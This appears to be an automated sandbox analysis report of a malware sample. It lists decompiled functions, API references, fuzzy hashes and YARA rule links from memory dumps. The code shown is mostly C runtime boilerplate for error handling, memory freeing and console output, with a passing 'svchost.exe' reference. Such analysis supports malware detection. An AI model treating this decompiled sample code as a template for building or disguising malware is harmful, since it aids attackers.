Opcode Fuzzy Hash: 21d9766ffed661443d41726d093e7c48fa334fdd5e103aaeb707956e1c14e358
Instruction Fuzzy Hash: 2CB13876D062959FDB15CF28C840BEEBBEDEF86350F18C1EAF8459B241D6348909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 030661EB, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 030662B2
___AdjustPointer.LIBCMT ref: 030662D5
___AdjustPointer.LIBCMT ref: 03066371

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 893840c03d31098680b52c39b3e4b0284f697132cf43f4a12ab01ce4610a28b2
Instruction ID: 32e51d2f6ec8c4ce1bca868db9d03b9ac27cdf86a2958993ef9f915df3b50356
Opcode Fuzzy Hash: 893840c03d31098680b52c39b3e4b0284f697132cf43f4a12ab01ce4610a28b2
Instruction Fuzzy Hash: D451D47650671ADFEB29CF50D840BAAB7E8FF84201F18452DD8424B198D736E981C794

Uniqueness

Uniqueness Score: -1.00%

Function 0304F50D, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0304F5D4
___AdjustPointer.LIBCMT ref: 0304F5F7
___AdjustPointer.LIBCMT ref: 0304F693

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 27d168040d483e6b7c724327e10d7280edbbd0c6489ab8ba8bd649047910272e
Instruction ID: a330ec805632db6aa86fd4048780d79cfaa4aca7fb36d68efd91ac7de4bcde3c
Opcode Fuzzy Hash: 27d168040d483e6b7c724327e10d7280edbbd0c6489ab8ba8bd649047910272e
Instruction Fuzzy Hash: 4C51A1F6A022039FDB65DF14D840BBAB7E9EF44314F184539ED518B1A0E731EA90CB90

Uniqueness

Uniqueness Score: -1.00%

Function 030399F2, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0303A014: _free.LIBCMT ref: 0303A022

Part of subcall function 03039814: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0303E350,?,00000000,00000000), ref: 030398C0

GetLastError.KERNEL32 ref: 03039A5A
__dosmaperr.LIBCMT ref: 03039A61
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 03039AA0
__dosmaperr.LIBCMT ref: 03039AA7

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 8bdb264abfc5dbefc708f70643f098c3f38962b1b30a368e7339a0fd2ecf983f
Instruction ID: 02d44e03f0904e9b70e7b7ebe838328c77f075fc9744479241d81d220e067390
Opcode Fuzzy Hash: 8bdb264abfc5dbefc708f70643f098c3f38962b1b30a368e7339a0fd2ecf983f
Instruction Fuzzy Hash: 4C21AAB5602B156FDB20EF668C80FAB77ACEF463647148658F9299B250E7B0DC5087E0

Uniqueness

Uniqueness Score: -1.00%

Function 6D86859A, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D86859A(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6D869796(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6D869796(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6D866A25(GetLastError());
									_t19 =  *((intOrPtr*)(E6D866A5B(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6D868BD6(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6D866A25(GetLastError());
						return  *((intOrPtr*)(E6D866A5B(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6D868BD6(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6D868BBC(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x6d8685a1
0x6d8685a6
0x6d8685c4
0x6d8685c6
0x6d8685c9
0x6d8685f6
0x6d8685fe
0x6d868600
0x6d868619
0x6d86861c
0x6d86861f
0x6d86862d
0x6d86863c
0x6d868644
0x6d868646
0x6d86865f
0x6d868662
0x6d868662
0x6d868648
0x6d86864f
0x6d86865a
0x6d86865a
0x6d868664
0x00000000
0x6d868664
0x6d868624
0x6d868629
0x6d86862b
0x00000000
0x00000000
0x00000000
0x6d86862b
0x6d868609
0x00000000
0x6d868614
0x6d8685cb
0x6d8685ce
0x6d8685d1
0x6d8685e4
0x6d8685e7
0x6d8685ba
0x6d8685ba
0x00000000
0x6d8685bd
0x6d8685d7
0x6d8685dc
0x6d8685de
0x6d868668
0x6d868668
0x00000000
0x6d8685de
0x6d8685a8
0x6d8685ad
0x6d8685b2
0x6d8685b4
0x6d8685b7
0x00000000

APIs

Part of subcall function 6D868BBC: _free.LIBCMT ref: 6D868BCA

Part of subcall function 6D869796: WideCharToMultiByte.KERNEL32(?,00000000,6D86A4BF,00000000,00000001,6D86A44E,6D86C4B3,?,6D86A4BF,?,00000000,?,6D86C222,0000FDE9,00000000,?), ref: 6D869838

GetLastError.KERNEL32 ref: 6D868602
__dosmaperr.LIBCMT ref: 6D868609
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D868648
__dosmaperr.LIBCMT ref: 6D86864F

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: fe4a7e9ee2067474cab6b00a432cb4cbbe6fd6e72ff571e8d694f42afb48efc5
Instruction ID: d46cd864669ec14ecfc5efeb9ab15a56bcdb1c20371b7ed8838323f52a4b5873
Opcode Fuzzy Hash: fe4a7e9ee2067474cab6b00a432cb4cbbe6fd6e72ff571e8d694f42afb48efc5
Instruction Fuzzy Hash: 30218171608686AF9B119F698C8DD6BB7BDFF063787018918FA1D97180EB31DC408AB1

Uniqueness

Uniqueness Score: -1.00%

Function 03037BF3, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0000005C,?,030349A4,0000005C,?,?,?,03034ABB,?,?,?,00000000,svchost.exe,?,0000005C), ref: 03037BF8
_free.LIBCMT ref: 03037C55
_free.LIBCMT ref: 03037C8B
SetLastError.KERNEL32(00000000,0000000A,000000FF,?,?,03034ABB,?,?,?,00000000,svchost.exe,?,0000005C), ref: 03037C96

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e4442b2de44b42b3686edb355c04464fe9f1c7a296037cfa059f81af44ededf6
Instruction ID: db5a1b84afb67957109b6a38d1d659611b04fc4d8e5bfddc79ac813e48c54540
Opcode Fuzzy Hash: e4442b2de44b42b3686edb355c04464fe9f1c7a296037cfa059f81af44ededf6
Instruction Fuzzy Hash: 1D1129FA3537017FDA60F6B5AD84EAB238D8BC7A757280A28F5349B1C1EF2588054960

Uniqueness

Uniqueness Score: -1.00%

Function 6D868066, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D868066(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6d877060; // 0x8
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6D869BB2(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6D868473(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6D869BB2(__eflags,  *0x6d877060, _t51);
							if(__eflags != 0) {
								E6D867E68(_t51, 0x6d8c1a30);
								E6D867CC2(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6D869BB2(__eflags,  *0x6d877060, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6D869BB2(0,  *0x6d877060, 0);
							_push(0);
							L9:
							E6D867CC2();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6D869B73(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6d877060; // 0x8
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6D867AB7(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6d877060; // 0x8
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6D869BB2(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6D868473(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6D869BB2(__eflags,  *0x6d877060, _t60);
								if(__eflags != 0) {
									E6D867E68(_t60, 0x6d8c1a30);
									E6D867CC2(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6D869BB2(__eflags,  *0x6d877060, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6D869BB2(__eflags,  *0x6d877060, _t20);
								_push(_t60);
								L25:
								E6D867CC2();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6D869B73(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6d877060; // 0x8
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6D867AB7(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6d877060; // 0x8
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6D869BB2(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6D868473(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6D869BB2(__eflags,  *0x6d877060, _t54);
											if(__eflags != 0) {
												E6D867E68(_t54, 0x6d8c1a30);
												E6D867CC2(0);
												goto L45;
											} else {
												_t40 = 0;
												E6D869BB2(__eflags,  *0x6d877060, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6D869BB2(0,  *0x6d877060, 0);
											_push(0);
											L41:
											E6D867CC2();
											goto L36;
										}
									}
								} else {
									_t54 = E6D869B73(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6d877060; // 0x8
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6d868066
0x6d868066
0x6d868071
0x6d868073
0x6d868078
0x6d86807b
0x6d868099
0x6d86809c
0x6d8680a1
0x6d8680a3
0x00000000
0x6d8680a5
0x6d8680b1
0x6d8680b4
0x6d8680b5
0x6d8680b7
0x6d8680dc
0x6d8680de
0x6d8680f7
0x6d8680fe
0x6d868103
0x00000000
0x6d8680e0
0x6d8680e0
0x6d8680e9
0x6d8680ee
0x00000000
0x6d8680ee
0x6d8680b9
0x6d8680b9
0x6d8680b9
0x6d8680c2
0x6d8680c7
0x6d8680c8
0x6d8680c8
0x6d8680cd
0x00000000
0x6d8680cd
0x6d8680b7
0x6d86807d
0x6d868083
0x6d868087
0x6d868094
0x00000000
0x6d868089
0x6d86808c
0x6d868106
0x6d868106
0x6d86808e
0x6d86808e
0x6d86808e
0x6d868090
0x6d868090
0x6d868090
0x6d86808c
0x6d868087
0x6d868109
0x6d868111
0x6d868113
0x6d868115
0x6d86811d
0x6d868122
0x6d868123
0x6d868128
0x6d868129
0x6d86812c
0x6d868146
0x6d868149
0x6d86814e
0x6d868150
0x00000000
0x6d868152
0x6d86815e
0x6d868161
0x6d868162
0x6d868164
0x6d868187
0x6d868189
0x6d8681a0
0x6d8681a7
0x6d8681ac
0x00000000
0x6d86818b
0x6d868192
0x6d868197
0x00000000
0x6d868197
0x6d868166
0x6d86816d
0x6d868172
0x6d868173
0x6d868173
0x6d868178
0x00000000
0x6d868178
0x6d868164
0x6d86812e
0x6d868134
0x6d868136
0x6d868138
0x6d868141
0x00000000
0x6d86813a
0x6d86813a
0x6d86813d
0x6d8681b7
0x6d8681b7
0x6d8681bc
0x6d8681bf
0x6d8681c0
0x6d8681c1
0x6d8681c8
0x6d8681ca
0x6d8681cf
0x6d8681d2
0x6d8681f0
0x6d8681f3
0x6d8681f8
0x6d8681fa
0x00000000
0x6d8681fc
0x6d868208
0x6d86820c
0x6d86820e
0x6d868233
0x6d868235
0x6d86824e
0x6d868255
0x00000000
0x6d868237
0x6d868237
0x6d868240
0x6d868245
0x00000000
0x6d868245
0x6d868210
0x6d868210
0x6d868210
0x6d868219
0x6d86821e
0x6d86821f
0x6d86821f
0x00000000
0x6d868224
0x6d86820e
0x6d8681d4
0x6d8681da
0x6d8681dc
0x6d8681de
0x6d8681eb
0x00000000
0x6d8681e0
0x6d8681e0
0x6d8681e3
0x6d86825d
0x6d86825d
0x6d8681e5
0x6d8681e5
0x6d8681e5
0x6d8681e5
0x6d8681e7
0x6d8681e7
0x6d8681e7
0x6d8681e3
0x6d8681de
0x6d868260
0x6d868268
0x6d86826a
0x6d86826a
0x6d868271
0x6d86813f
0x6d8681af
0x6d8681af
0x6d8681b1
0x00000000
0x6d8681b3
0x6d8681b6
0x6d8681b6
0x6d8681b1
0x6d86813d
0x6d868138
0x6d868117
0x6d86811c
0x6d86811c

APIs

GetLastError.KERNEL32(?,?,?,6D86BF69,00000000,00000001,6D86A4BF,?,6D86C428,00000001,?,?,?,6D86A44E,?,00000000), ref: 6D86806B
_free.LIBCMT ref: 6D8680C8
_free.LIBCMT ref: 6D8680FE
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6D86C428,00000001,?,?,?,6D86A44E,?,00000000,00000000,6D875808,0000002C,6D86A4BF), ref: 6D868109

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7a82675bd0c3325a99f93c333c3803c51ad3698b4da1ffc70e2c7988dd4db7f9
Instruction ID: e079edcb2a9d9e8075716fbaed06d3952a3021c81d5be92043d52d25bae199b7
Opcode Fuzzy Hash: 7a82675bd0c3325a99f93c333c3803c51ad3698b4da1ffc70e2c7988dd4db7f9
Instruction Fuzzy Hash: B711C672A4C69A2ADB11567C4C8CF2E257AEFC7779B124E24F728962C0DF718C0182B1

Uniqueness

Uniqueness Score: -1.00%

Function 03037D4A, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0303787B,03037F65,?,?,0303727A), ref: 03037D4F
_free.LIBCMT ref: 03037DAC
_free.LIBCMT ref: 03037DE2
SetLastError.KERNEL32(00000000,0000000A,000000FF,?,?,0303787B,03037F65,?,?,0303727A), ref: 03037DED

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8d6646994e11c62843702c66f4ccc2690bb33ead3d4d554f1e36cfed2e86cacd
Instruction ID: 30b578f6e48a200d7d7dc130a24f31e9d994278b74878132ee5011903737be4b
Opcode Fuzzy Hash: 8d6646994e11c62843702c66f4ccc2690bb33ead3d4d554f1e36cfed2e86cacd
Instruction Fuzzy Hash: 891148FA3477417FE661F6B99C80EBB22ADDFC39717240724F528DA1C0DF2488058560

Uniqueness

Uniqueness Score: -1.00%

Function 6D8681BD, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6D8681BD(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6d877060; // 0x8
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6D869BB2(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6D868473(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6D869BB2(__eflags,  *0x6d877060, _t18);
							if(__eflags != 0) {
								E6D867E68(_t18, 0x6d8c1a30);
								E6D867CC2(0);
								goto L13;
							} else {
								_t13 = 0;
								E6D869BB2(__eflags,  *0x6d877060, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6D869BB2(0,  *0x6d877060, 0);
							_push(0);
							L9:
							E6D867CC2();
							goto L4;
						}
					}
				} else {
					_t18 = E6D869B73(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6d877060; // 0x8
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6d8681c8
0x6d8681ca
0x6d8681cf
0x6d8681d2
0x6d8681f0
0x6d8681f3
0x6d8681f8
0x6d8681fa
0x00000000
0x6d8681fc
0x6d868208
0x6d86820c
0x6d86820e
0x6d868233
0x6d868235
0x6d86824e
0x6d868255
0x00000000
0x6d868237
0x6d868237
0x6d868240
0x6d868245
0x00000000
0x6d868245
0x6d868210
0x6d868210
0x6d868210
0x6d868219
0x6d86821e
0x6d86821f
0x6d86821f
0x00000000
0x6d868224
0x6d86820e
0x6d8681d4
0x6d8681da
0x6d8681de
0x6d8681eb
0x00000000
0x6d8681e0
0x6d8681e3
0x6d86825d
0x6d86825d
0x6d8681e5
0x6d8681e5
0x6d8681e5
0x6d8681e7
0x6d8681e7
0x6d8681e7
0x6d8681e3
0x6d8681de
0x6d868260
0x6d868268
0x6d868271

APIs

GetLastError.KERNEL32(00000001,6D863211,00000000,6D866A60,6D868437,00000000,?,6D8642B3,6D863211,?,6D863211,00000008,?,?,6D861249,00000000), ref: 6D8681C2
_free.LIBCMT ref: 6D86821F
_free.LIBCMT ref: 6D868255
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6D8642B3,6D863211,?,6D863211,00000008,?,?,6D861249,00000000), ref: 6D868260

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: f936171df50c5ed27c0397480800bad4630d75829edff32383ea479afea0e499
Instruction ID: 5c82cfe0da4660bdbb32324c6954c5c1bdee7af626a398a00a01aad543fcadda
Opcode Fuzzy Hash: f936171df50c5ed27c0397480800bad4630d75829edff32383ea479afea0e499
Instruction Fuzzy Hash: 4511E93264C5A52ADB015A7D5C9CF2A217AEBC7778B220E25F728D23C0DF718C01C2B0

Uniqueness

Uniqueness Score: -1.00%

Function 0306610B, Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 03066127
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 03066140

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 6fbc555b6aee27532a3083f087b3daad81328d89770240409ef6b30b17a819d2
Instruction ID: aafc619f6c36c7ec261bc8b07a37fc8df43f389a2d0a81ea1af8b55cb352923f
Opcode Fuzzy Hash: 6fbc555b6aee27532a3083f087b3daad81328d89770240409ef6b30b17a819d2
Instruction Fuzzy Hash: AB01FC3760B3399EF656D7789CC869A26E9EB89674728432AF5684D0FAEF6288004144

Uniqueness

Uniqueness Score: -1.00%

Function 0304E740, Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0304E75C
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0304E775

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 6a310bdaba1b2cd53659a7e1174290113c22bea05de4fe7c1e04e8790538a4ff
Instruction ID: 643ddff562542bac607532b9b2e7ca61cd13af1f6273eb3da7e786bd29e27004
Opcode Fuzzy Hash: 6a310bdaba1b2cd53659a7e1174290113c22bea05de4fe7c1e04e8790538a4ff
Instruction Fuzzy Hash: C10128B650B3226DF625F7B5FCC8A5B2699FB496B67240339E310580F0EFA14900C150

Uniqueness

Uniqueness Score: -1.00%

Function 03040E66, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0303FAE5,?,00000001,?,00000001,?,0303E98B,?,?,00000001), ref: 03040E7D
GetLastError.KERNEL32(?,0303FAE5,?,00000001,?,00000001,?,0303E98B,?,?,00000001,?,00000001,?,0303EED7,0303B5DD), ref: 03040E89

Part of subcall function 03040E4F: CloseHandle.KERNEL32(FFFFFFFE,03040E99,?,0303FAE5,?,00000001,?,00000001,?,0303E98B,?,?,00000001,?,00000001), ref: 03040E5F

___initconout.LIBCMT ref: 03040E99

Part of subcall function 03040E11: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,03040E40,0303FAD2,00000001,?,0303E98B,?,?,00000001,?), ref: 03040E24

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0303FAE5,?,00000001,?,00000001,?,0303E98B,?,?,00000001,?), ref: 03040EAE

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 65e1ba1b84e7a161a694dda5824a4181cc0c69a63e382f3b76da69dfe238940e
Instruction ID: 1f805ce33a2f2be1aa7d617c4d213d9c90fed34c1682c3dd800807ae51674d9e
Opcode Fuzzy Hash: 65e1ba1b84e7a161a694dda5824a4181cc0c69a63e382f3b76da69dfe238940e
Instruction Fuzzy Hash: 0FF0377A403224FBCF22BF97DC04B8A7F66FB45270B054064FA1895120C736DA70DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D86D1B6, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D86D1B6(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6d877860, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6D86D19F();
					E6D86D161();
					_t13 = WriteConsoleW( *0x6d877860, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6d86d1d3
0x6d86d1d7
0x6d86d1e4
0x6d86d1e9
0x6d86d204
0x6d86d204
0x6d86d20a

APIs

WriteConsoleW.KERNEL32(?,?,6D86A4BF,00000000,?,?,6D86CC1A,?,00000001,?,00000001,?,6D86BEF8,00000000,00000000,00000001), ref: 6D86D1CD
GetLastError.KERNEL32(?,6D86CC1A,?,00000001,?,00000001,?,6D86BEF8,00000000,00000000,00000001,00000000,00000001,?,6D86C44C,6D86A44E), ref: 6D86D1D9

Part of subcall function 6D86D19F: CloseHandle.KERNEL32(FFFFFFFE,6D86D1E9,?,6D86CC1A,?,00000001,?,00000001,?,6D86BEF8,00000000,00000000,00000001,00000000,00000001), ref: 6D86D1AF

___initconout.LIBCMT ref: 6D86D1E9

Part of subcall function 6D86D161: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D86D190,6D86CC07,00000001,?,6D86BEF8,00000000,00000000,00000001,00000000), ref: 6D86D174

WriteConsoleW.KERNEL32(?,?,6D86A4BF,00000000,?,6D86CC1A,?,00000001,?,00000001,?,6D86BEF8,00000000,00000000,00000001,00000000), ref: 6D86D1FE

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 7d371c41440d2162219bebc01e38cfda245a38b6af33320fe0bba5ba1deb73a3
Instruction ID: bc8cc81ee4ce0ddff2adeb3c48a2e87e18c53fe2b3fb4843db4e53e1c02df860
Opcode Fuzzy Hash: 7d371c41440d2162219bebc01e38cfda245a38b6af33320fe0bba5ba1deb73a3
Instruction Fuzzy Hash: 8CF09836904269BBCF121E96CC0CE9E7F76FB4B3B1F154410FA2895220CB329860DBE4

Uniqueness

Uniqueness Score: -1.00%

Function 6D86424B, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

